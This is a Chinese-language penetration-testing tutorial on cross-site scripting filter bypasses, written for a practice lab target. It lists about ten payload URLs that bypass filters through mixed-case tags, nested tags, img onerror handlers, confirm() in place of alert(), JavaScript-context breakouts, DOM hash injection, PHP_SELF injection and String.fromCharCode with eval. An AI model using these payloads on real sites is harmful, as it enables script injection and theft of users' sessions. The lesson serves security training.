1. 首页
  2. 渗透测试

【原创】WEB安全五章 漏洞学习与利用 xss的绕过技巧

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

WEB安全五章 漏洞学习与利用03 xss的绕过技巧

xss绕过 以下部分 只针对暗月靶机 但是很多html属性同样合适。

这个部分 带单引号 在gpc过滤的时候不合适使用。

[code lang=”js”]
1、大小写绕过
http://target_sys.com/xss/xss04.php?name=<Script>alert(1);</Script>
2、属性多余
http://target_sys.com/xss/xss05.php?name=<script<script>>alert(1);</sc</script>ript>
3、转换标签
http://target_sys.com/xss/xss06.php?name=moon&lt;img src=a onerror=alert(1)&gt;
4、禁用alert
http://target_sys.com/xss/xss07.php?name=&lt;img src="1" onerror="confirm(‘xss’)"&gt;
5、js输出
http://target_sys.com/xss/xss08.php?name=moon";alert($a)//
6、js过滤输出
过滤单引号
http://target_sys.com/xss/xss09.php?name=moon’;alert($a);//
7、dom输出
http://target_sys.com/xss/xss10.php?name=moon#<script>alert(1);</script>
http://target_sys.com/xss/xss10.php?name=moon#<script>alert(/xss/);</script>
hash 属性是一个可读可写的字符串,该字符串是 URL 的锚部分(从 # 号开始的部分)。
substring 从#开始截取后面的部分
8、urlxss
http://target_sys.com/xss/xss11.php/" onsubmit="alert(‘1’)
$_SERVER[‘PHP_SELF’]
9、过滤特殊字符
php开启gpc之后
单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线
http://target_sys.com/xss/xss12.php?name=<script>alert(1);</script>
http://target_sys.com/xss/xss12.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,13))</script>
10、过滤大小号

http://target_sys.com/xss/xss13.php?name=moon’ onmouseover=’javascript:alert(1)

[/code]

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/232.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息